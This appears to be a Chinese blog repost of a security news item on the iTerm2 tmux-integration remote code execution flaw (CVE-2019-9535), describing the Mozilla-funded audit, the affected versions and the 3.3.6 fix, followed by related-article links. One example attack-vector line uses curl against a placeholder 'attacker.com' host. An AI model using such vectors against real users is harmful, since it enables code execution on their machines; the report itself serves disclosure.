mac ssh工具_Mac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

最新推荐文章于 2024-07-10 17:40:25 发布
最新推荐文章于 2024-07-10 17:40:25 发布
阅读量157 收藏
点赞数
文章标签: mac ssh工具 macos iterm2 指纹代替输入密码 mac终端一次命令在多个虚拟机执行

由Mozilla开源支持计划(MOSS)资助、网络安全公司Radically Open Security(ROS)开展的一次独立安全审计结果显示,iTerm 2 中存在一个严重的远程代码执行(RCE)漏洞,且至少已存在7年。

iTerm 2 简介

iTerm2是全球最热门的终端模拟器之一,是开发人员经常使用的MacOS 终端工具,是Mac内置终端app最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

a3a7f020d5745f836cdefe7b29335dad.png

MOSS 计划选择iTerm2进行安全审计的原因在于它处理不受信任的数据且其使用范围广泛,用户包括高风险目标如开发人员和系统管理员。

漏洞概述

该漏洞的CVE编号是CVE-2019-9535。

在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

开发人员George Nachman指出,“审计发现某个问题在收到一定的输入后会导致iTerm2发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在iTerm2构造的输入时,攻击者就能够在用户机器上执行代码。”

Nachman认为该漏洞影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的安全工程师Tom Ritter指出,这个漏洞源自iTerm2中的 tmux集成功能。Tumx应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过ssh连接至恶意服务器,通过curl 获取恶意网站,或者通过tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机器连接到恶意SSH服务器之后,在机器上执行命令的 PoC视频。在这个案例中,只打开一个计算器作为其它更具恶意的命令的占位符。

一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

f98460217e561161a393233a9006efbb.png

目前补丁已发布但自动更新尚未推送,建议用户立即在iTerm2目录中选择“检查新版本”手动更新至最新版本3.3.6。

*参考来源:Mozilla、TheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM

29f8f9e122146dd43400219c947ab488.gif

精彩推荐

960384ba7f571bd4d0f309a3ab366717.png

053de7351b5fe08007ce4430075ce794.png

0a263ad30b611de626d3a2e3ee25979d.png

69390da87808b0c7fdc08fc52000466b.png

5f8cc7cd08039fbfd550a863d88eb5c5.png6a007f565cba2eeedf2b779f21d70402.gif4eb8a3f851de84e0369b4c46bf899d7f.gif

weixin_39814378
关注
openssh漏洞_DLink DIR859 RCE漏洞(CVE201917621)分析复现
weixin_39644139的博客
11-26 605
一、模拟运行固件1.环境搭建使用attifyos 中的环境进行模拟时可能会出现各种问题,后来自己搭建环境,可以正常运行。firmadyne 环境搭建:https://github.com/firmadyne/firmadyneqemu 编译安装:https://download.qemu.org/qemu-2.5.0.tar.bz2qemu 建议使用 qemu-2.5.0 版本进行编译...
显示行数 设置ssh终端_mac终端iTerm2配置
weixin_39605345的博客
12-20 1150
本文主要介绍maciTerm2的基本配置,包括两方面内容:主题和快捷键。写这篇的目的是为自己电脑的配置个记录,以备不时之需。主题在配置完主题后,当你打开iTerm2时,会显示如下界面这个主题会让你的光标提示符之前的内容一目了然,尤其是当你进入git目录之后,还会提示git本地代码库相关的状态,例如:它会提示你所在的分支,以及文件是否有变化。下面我们一步步来配置吧。安装oh-my-zshoh-m...
终端安全求生指南(三)--脆弱性管理
weixin_34037173的博客
07-25 398
脆弱性管理所有的创新技术对***者来讲都是受益的,自动化、众包,云计算,大数据,移动,社会工程学,所有的创新技术都可以用来进行***,更糟糕的是,***者只需要成功一次,而你需要永远保持警惕。某种情况下,在你网络当中充满着复杂联系的软件间之间,脆弱性可被长时间的充分利用,持续管理这些风险对安全来讲是非常重要的。你可能面临着另外的一个挑战,那就是来自董事会针对安全以及风险降低...
RCE远程控制漏洞(上)
hmysn的博客
06-22 951
目录什么是RCE远程控制漏洞漏洞的危害:PHP 会造成RCE执行漏洞的相关函数:linux的命令拼接符号:RCE漏洞作为漏洞中比较常见的一个,近来在apache和python等等软件上都出现过巨大的bug,本篇文章对于RCE漏洞将会进行一个简单的介绍,关于什么是RCERCE的危害以及一些我们在寻找RCE漏洞时所需要的简单的一些基础知识的了解和预备,下一篇文章将会在靶场中对于这个漏洞的相关问题进行实操!...
OpenSSH 易受RCE漏洞影响
最新发布
smellycat000的专栏
07-10 446
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士OpenSSH 安全网络套件的多个版本易受一个新漏洞(CVE-2024-6409)的影响,可触发远程代码执行 (RCE)。CVE-2024-6409(CVSS评分7.0)与CVE-2024-6387(即RegreSSHion)不同,与信号处理中因一个竞争条件在privsep子进程中的代码执行有关,仅影响 Red Hat Enterprise Li...
MacOS系统安装渗透测试相关工具
Y525698136的博客
01-12 2120
MacOS系统安装渗透测试相关工具
html应用json 文件_安全研究 | Slack桌面应用程序的RCE漏洞+XSS漏洞
weixin_36484519的博客
01-26 239
对于Slack的桌面应用程序来说,一些应用内跳转、XSS、逻辑重定向和HTML或javascript注入bug,都有可能导致任意代码执行。这篇Writeup就讲述了作者通过构造HTML注入,绕过Slack安全控制措施,最终在Slack桌面应用中实现了RCE漏洞的情况。为了证明该RCE漏洞造成的实际危害和利用场景,作者从HTML注入和Javascript payload的构造说起,最后还...
Mac OS 终端利器 iTerm2
09-23
这时,iTerm2就应运而生,它被誉为Mac OS终端利器,以其丰富的特性、高效的操作体验和高度的自定义性赢得了用户的青睐。 首先,iTerm2提供了一流的性能和流畅度。相比于原生的Terminal,iTerm2在处理大量命令和...
Mac 终端神器 iTerm2 新增 Python API
01-20
Mac 终端神器 iTerm2 新增 Python API】这一重大更新为 Python 开发者带来了新的机遇。iTerm2,一款备受推崇的 macOS 终端应用程序,已经在其最新的测试版本中添加了 Python API,允许用户通过 Python 脚本直接...
mac终端iTerm2
12-18
Mac操作系统中,iTerm2是一款非常受欢迎的终端模拟器,它替代了默认的Terminal.app,提供了更多高级功能和自定义选项,使得开发者和系统管理员的工作效率得以提升。本篇文章将深入探讨iTerm2的安装、配置以及一些...
MikroTik RouterOS-v6.48.1Stable.zip
04-29
MikroTik RouterOS v6.48.1 L6级许可,可升级到7.x版本。
Homebrew软件包管理器中发现RCE漏洞,小心你的Mac和Linux
IT_bear_的博客
04-27 318
官方Homebrew Cask存储库中发现了严重的安全漏洞,攻击者可能已经利用了该漏洞在安装Homebrew的失陷主机上执行任意代码。 该安全漏洞由一名日本安全研究人员RyotaK于4月18日报告给官方,该问题源于其GitHub存储库中代码变更的处理方式,从而导致了可能出现恶意代码会被自动审查和合并的情况,该漏洞已于4月19日修复。 Homebrew是一个免费的开源软件包管理器解决方案,支持在Apple的macOS操作系统与Linux操作系统上安装软件。Homebrew Cask对功能进行了扩展,使其支
开源包管理器Homebrew被 RCE,影响 macOS 和 Linux 系统
smellycat000的专栏
04-25 175
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士Homebrew Cask 官方仓库最近被一个严重RCE 漏洞,可导致攻击者在安装了 Homebrew 的用户机器上执行任意...
LInux SSH Server远程代码执行漏洞 (CVE-2024-6387)处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-02 1789
的函数,最终造成Double-Free内存管理问题。根据已公开技术细节中的描述,在开启ASLR的i386设备上,利用该漏洞大约需要6-8小时获取root shell,在开启ASLR的amd64设备上则可能需要约一周左右。Red Hat Enterprise Linux 9,该缺陷不会影响Red Hat Enterprise Linux 8附带的OpenSSH版本,因其中所涉易受攻击的代码是在上游的较新OpenSSH版本中引入的,且未向后移植到Red Hat Enterprise Linux 8。
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2537
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
网络攻防之ssh篇(穿插ctf的web例题)
qq_62097048的博客
07-08 1339
对于ssh进行的相关操作,有ctf的web例题
网康防火墙前台RCE PoC漏洞分析
weixin_50464560的博客
09-30 1745
漏洞描述 网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。 这个洞是今hvv期间爆出来的,危害很高,因此甲方baba要求我一下分析的工作,好家伙,开局一个漏洞名称,报告内容全靠编,安排。 在网上找一条...
网络安全-RCE(远程命令执行漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有严格的安全控制,则可能会导致攻击者通过该接口提交“意想
Mac终端美化:iTerm2 + zsh + Oh My Zsh + Powerlevel10k打造高效开发环境
本文旨在详细介绍如何在Mac系统上利用iTerm2、zsh、Oh My Zsh和Powerlevel10k工具组合,打造出一个强大且高度个性化的终端环境,以提升开发者的工作效率。作者Sui Xin首先强调了终端和代码编辑器在开发工作中的重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值